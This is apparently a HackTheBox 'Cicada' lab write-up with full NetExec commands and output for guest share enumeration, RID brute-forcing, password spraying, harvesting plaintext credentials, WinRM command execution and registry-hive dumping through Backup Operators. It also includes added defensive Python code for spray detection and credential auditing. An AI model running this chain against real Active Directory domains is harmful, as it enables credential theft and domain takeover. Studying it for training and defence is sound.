This post simply demonstrates how to solve the machine using only NetExec. For a more in-depth walkthrough, check out ippsec's video and 0xdf's writeup.

Cicada is an easy Active Directory machine from HackTheBox. The core concepts here are user enumeration, password spraying, SMB shares, and the Backup Operators group. In this writeup, I will walk through the entire machine using only NetExec.

Make sure you have the latest version of NetExec by upgrading it with pipx using the following command:

➜  pipx upgrade netexec
upgraded package netexec from 1.3.0+a5ec90e4 to 1.3.0+8046495d (location: /home/serioton/.local/pipx/venvs/netexec)

USER

Enumeration

First, we use the --generate-hosts-file option, which automatically retrieves the domain name and NetBIOS name, then generates an entry we can add to our /etc/hosts file.

➜  nxc smb 10.10.11.35 --generate-hosts-file hosts
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
➜  cat hosts
10.10.11.35 CICADA-DC CICADA-DC.cicada.htb cicada.htb

SMB

Let's attempt guest authentication by using an arbitrary username with an empty password. As you can see, we are able to list shares with guest access. There are non-default shares named "HR" and "DEV", so let's take note of them.

➜  nxc smb 10.10.11.35 -u a -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share

Now, let's use the --rid-brute option to enumerate domain users and groups by cycling through RIDs.

➜  nxc smb 10.10.11.35 -u a -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)

We can clean up the output (saved to the file tmp) to get a list containing only the usernames.

➜  cat tmp | cut -d '\' -f2 | awk '{print $1}'
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
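Names that contain spaces (group names such as "Dev Support") break a field-based cut/awk pipeline, so here is a small parser for the --rid-brute output format, added as an example and not part of the original post: it keeps only SidTypeUser entries, drops well-known RIDs below 1000 and machine accounts ending in $, and can be pointed at a saved output file. The SAMPLE text is a constructed subset of the lines above.

```python
"""Turn NetExec --rid-brute output into a clean list of user accounts."""
import re
import sys

# One entry per line of `nxc smb <host> -u a -p '' --rid-brute`, e.g.
#   SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
# The name may contain spaces ("Enterprise Read-only Domain Controllers"),
# which is why a field-based cut/awk pipeline is not enough.
RID_RE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(output: str) -> list[dict]:
    """Return one dict per resolved RID: rid (int), domain, name, kind."""
    entries = []
    for line in output.splitlines():
        m = RID_RE.search(line)
        if m:
            entries.append({
                "rid": int(m["rid"]),
                "domain": m["domain"],
                "name": m["name"],
                "kind": m["kind"],
            })
    return entries


def user_accounts(entries, include_builtin=False, include_machines=False):
    """Names of SidTypeUser entries, optionally dropping well-known RIDs
    (< 1000: Administrator, Guest, krbtgt) and machine accounts (name$)."""
    names = []
    for e in entries:
        if e["kind"] != "SidTypeUser":
            continue
        if not include_builtin and e["rid"] < 1000:
            continue
        if not include_machines and e["name"].endswith("$"):
            continue
        names.append(e["name"])
    return names


# Constructed sample: a subset of the lines shown above, in the captured format.
SAMPLE = """\
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\\emily.oscars (SidTypeUser)
"""

if __name__ == "__main__":
    # Usage: python rid_users.py [saved-rid-brute-output]; falls back to SAMPLE.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for name in user_accounts(parse_rid_brute(text)):
        print(name)
```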

Another thing we can try is the spider_plus module, which crawls every share we have read access to and records the files it finds.

➜  nxc smb 10.10.11.35 -u a -p '' -M spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 2 (HR, IPC$)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 0
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 1.24 KB

The spider_plus module saves the list of files in a JSON file. In our case, it dumped the results to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json". Looking at the output, we can see a file inside the HR share called "Notice from HR.txt", which we have read access to.

{
"HR": {
"Notice from HR.txt": {
"atime_epoch": "2024-08-28 18:31:48",
"ctime_epoch": "2024-03-14 13:29:03",
"mtime_epoch": "2024-08-28 18:31:48",
"size": "1.24 KB"
}
}
}

We can use the --get-file option along with the --share option to grab the file to our local machine.

➜  nxc smb 10.10.11.35 -u a -p '' --get-file 'Notice from HR.txt' notice-from-hr.txt --share HR
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Copying "Notice from HR.txt" to "notice-from-hr.txt"
SMB 10.10.11.35 445 CICADA-DC [+] File "Notice from HR.txt" was downloaded to "notice-from-hr.txt"

Inspecting the file reveals a plaintext password.

➜  cat notice-from-hr.txt
...
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
...

Since we don't know which user that password belongs to, we can spray it against the list of users we gathered earlier. In this case, we get a hit for the user "michael.wrightson".

➜  nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
...
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
...
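The defender's view of the same spray, added here as an example that is not part of the original post: one source trying a password across many accounts shows up as many distinct usernames failing from one origin in a short window, sometimes followed by a single success. The events are constructed in a simplified (timestamp, source, user, success) form, and the window and threshold values are assumptions.

```python
"""Flag password-spray patterns in authentication events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events as (timestamp, source_ip, username, success),
# modelled on the spray above: five accounts tried from one host, one hit.
EVENTS = [
    ("2025-02-11 18:40:01", "10.10.14.5", "john.smoulder", False),
    ("2025-02-11 18:40:01", "10.10.14.5", "sarah.dantelia", False),
    ("2025-02-11 18:40:02", "10.10.14.5", "michael.wrightson", True),
    ("2025-02-11 18:40:02", "10.10.14.5", "david.orelious", False),
    ("2025-02-11 18:40:03", "10.10.14.5", "emily.oscars", False),
    # An ordinary user mistyping once and then logging in: must not be flagged.
    ("2025-02-11 18:45:10", "10.10.14.9", "sarah.dantelia", False),
    ("2025-02-11 18:45:20", "10.10.14.9", "sarah.dantelia", True),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: {"accounts": [...], "compromised": [...]}} for every
    source whose failures hit >= min_accounts distinct users inside `window`.
    'compromised' lists accounts that succeeded from that source after the
    spray started, i.e. the credentials a responder should reset first."""
    by_src = defaultdict(list)
    for ts, src, user, ok in events:
        by_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user, ok))

    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        failures = [(t, u) for t, u, ok in evs if not ok]
        # Sliding window over the failures, counting distinct usernames.
        start = 0
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            users = {u for _, u in failures[start:end + 1]}
            if len(users) >= min_accounts:
                spray_start = failures[start][0]
                hits = sorted({u for t, u, ok in evs if ok and t >= spray_start})
                findings[src] = {"accounts": sorted(users), "compromised": hits}
                break
    return findings


if __name__ == "__main__":
    for src, info in detect_spray(EVENTS).items():
        print(f"spray from {src}: {len(info['accounts'])} accounts, "
              f"compromised: {info['compromised']}")
```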

With these credentials in hand, we can use the --users flag over LDAP to enumerate more users and check their descriptions, as some users store their passwords there.

➜  nxc ldap 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
LDAP 10.10.11.35 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.10.11.35 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.35 389 CICADA-DC Administrator 2024-08-26 20:08:03 10 Built-in account for administering the computer/domain
LDAP 10.10.11.35 389 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
LDAP 10.10.11.35 389 CICADA-DC krbtgt 2024-03-14 11:14:10 4 Key Distribution Center Service Account
LDAP 10.10.11.35 389 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
LDAP 10.10.11.35 389 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
LDAP 10.10.11.35 389 CICADA-DC michael.wrightson 2024-03-14 12:17:29 1
LDAP 10.10.11.35 389 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP 10.10.11.35 389 CICADA-DC emily.oscars 2024-08-22 21:20:17 1

Or, we can use the get-desc-users module for LDAP, which only retrieves the descriptions of the users.

➜  nxc ldap 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
LDAP 10.10.11.35 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
GET-DESC... 10.10.11.35 389 CICADA-DC [+] Found following users:
GET-DESC... 10.10.11.35 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.35 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3

We can see a note in david.orelious' description revealing his password, and the credentials check out over SMB.

➜  nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3

Let's check if our new user has access to the DEV share using the --shares option.

➜  nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share

Indeed, the user has read access to that share. Once again, let's use the spider_plus module to look for interesting files.

➜  nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 33
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 12
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.09 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 23 B
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 5.22 KB

The JSON output shows a PowerShell script called "Backup_script.ps1" inside the DEV share.

"DEV": {
"Backup_script.ps1": {
"atime_epoch": "2024-08-28 18:28:22",
"ctime_epoch": "2024-03-14 13:31:38",
"mtime_epoch": "2024-08-28 18:28:22",
"size": "601 B"
}
}

We can use the same command as before to download the PowerShell script from the DEV share.

➜  nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --get-file 'Backup_script.ps1' Backup_script.ps1 --share DEV
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Copying "Backup_script.ps1" to "Backup_script.ps1"
SMB 10.10.11.35 445 CICADA-DC [+] File "Backup_script.ps1" was downloaded to "Backup_script.ps1"

Looking through the script, we find hardcoded credentials for the user emily.oscars.

➜  cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
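Both the spider_plus JSON and this script are exactly what a share audit should flag, so here is an added example (not the author's code) that flattens the spider_plus metadata down to the scripts and notes worth reviewing and scans a script body for hardcoded-credential patterns such as ConvertTo-SecureString "..." -AsPlainText. The JSON and the script body are constructed stand-ins for the ones shown above; the extension list and regexes are assumptions.

```python
"""Audit spider_plus results and downloaded scripts for hardcoded credentials."""
import json
import re

# File types on a share that commonly carry secrets and deserve a manual look.
INTERESTING_EXT = {".ps1", ".bat", ".cmd", ".vbs", ".xml", ".config", ".ini", ".txt"}

# Patterns that usually wrap a literal secret; group 1 is the secret itself.
SECRET_PATTERNS = [
    ("powershell-securestring",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    ("password-assignment",
     re.compile(r'\$?pass(?:word)?\s*[=:]\s*["\']([^"\']+)["\']', re.I)),
    ("default-password-note",
     re.compile(r'default password is:\s*(\S+)', re.I)),
]


def interesting_files(metadata: dict) -> list[tuple[str, str, str]]:
    """Flatten spider_plus JSON ({share: {path: {size, ...}}}) into
    (share, path, size) tuples for files whose extension is in INTERESTING_EXT."""
    found = []
    for share, files in metadata.items():
        for path, info in files.items():
            ext = "." + path.rsplit(".", 1)[-1].lower() if "." in path else ""
            if ext in INTERESTING_EXT:
                found.append((share, path, info.get("size", "?")))
    return found


def find_secrets(text: str) -> list[tuple[str, str]]:
    """Return (label, secret) for every hardcoded-credential pattern in text."""
    hits = []
    for label, pat in SECRET_PATTERNS:
        for m in pat.finditer(text):
            hits.append((label, m.group(1)))
    return hits


# Constructed sample: the two share listings from the runs above, merged,
# plus an image file that the audit should ignore.
SPIDER_JSON = """{
  "HR": {"Notice from HR.txt": {"size": "1.24 KB"}},
  "DEV": {"Backup_script.ps1": {"size": "601 B"}, "logo.png": {"size": "5.22 KB"}}
}"""

# Constructed script body with the same shape as Backup_script.ps1 (placeholder secret).
SCRIPT = '''$username = "svc_backup"
$password = ConvertTo-SecureString "Example-Secret-123" -AsPlainText -Force
Compress-Archive -Path C:\\smb -DestinationPath D:\\Backup\\smb.zip
'''

if __name__ == "__main__":
    for share, path, size in interesting_files(json.loads(SPIDER_JSON)):
        print(f"review: [{share}] {path} ({size})")
    for label, secret in find_secrets(SCRIPT):
        # Only a prefix is printed so the audit log itself does not leak the secret.
        print(f"hardcoded credential ({label}): {secret[:3]}***")
```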

These credentials are valid for SMB.

➜  nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt

They also work for WinRM, and the (Pwn3d!) tag tells us we can PSRemote into the box.

➜  nxc winrm 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)

I can't use Evil-WinRM here to grab the flag since I'm only using NetExec for this walkthrough... oh wait, NetExec has an option to execute PowerShell commands remotely using the -X option, so I can grab the flag anyway!

➜  nxc winrm 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -X 'cat C:\Users\emily.oscars.CICADA\desktop\user.txt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM 10.10.11.35 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.10.11.35 5985 CICADA-DC e8dbd384bcc5a717e0f57b0c4ee359fb

Root

Let's start by checking which groups our user belongs to using the groupmembership module for LDAP.

➜  nxc ldap 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -M groupmembership -o USER="emily.oscars"
LDAP 10.10.11.35 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
GROUPMEM... 10.10.11.35 389 CICADA-DC [+] User: emily.oscars is member of following groups:
GROUPMEM... 10.10.11.35 389 CICADA-DC Remote Management Users
GROUPMEM... 10.10.11.35 389 CICADA-DC Backup Operators
GROUPMEM... 10.10.11.35 389 CICADA-DC Domain Users

Looking at the output, we see that our user is a member of the Backup Operators group, a high-privilege group. Its members hold SeBackupPrivilege, which lets them read any file on the domain controller regardless of its ACL, including the registry hives and NTDS.dit. This allows us to dump NTDS, which is why membership in this group should be treated as equivalent to domain admin.

Backup Operators

Recently, @mpgn_x64 (https://x.com/mpgn_x64) added a new module to NetExec called backup_operator, which is a very neat addition! Thanks for that.

➜  nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -M backup_operator
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.10.11.35 445 CICADA-DC Saved HKLM\SAM to \\10.10.11.35\SYSVOL\SAM
BACKUP_O... 10.10.11.35 445 CICADA-DC Saved HKLM\SYSTEM to \\10.10.11.35\SYSVOL\SYSTEM
BACKUP_O... 10.10.11.35 445 CICADA-DC Saved HKLM\SECURITY to \\10.10.11.35\SYSVOL\SECURITY
SMB 10.10.11.35 445 CICADA-DC [*] Copying "SAM" to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SAM"
SMB 10.10.11.35 445 CICADA-DC [+] File "SAM" was downloaded to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SAM"
SMB 10.10.11.35 445 CICADA-DC [*] Copying "SECURITY" to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SECURITY"
SMB 10.10.11.35 445 CICADA-DC [+] File "SECURITY" was downloaded to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SECURITY"
SMB 10.10.11.35 445 CICADA-DC [*] Copying "SYSTEM" to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SYSTEM"
SMB 10.10.11.35 445 CICADA-DC [+] File "SYSTEM" was downloaded to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SYSTEM"
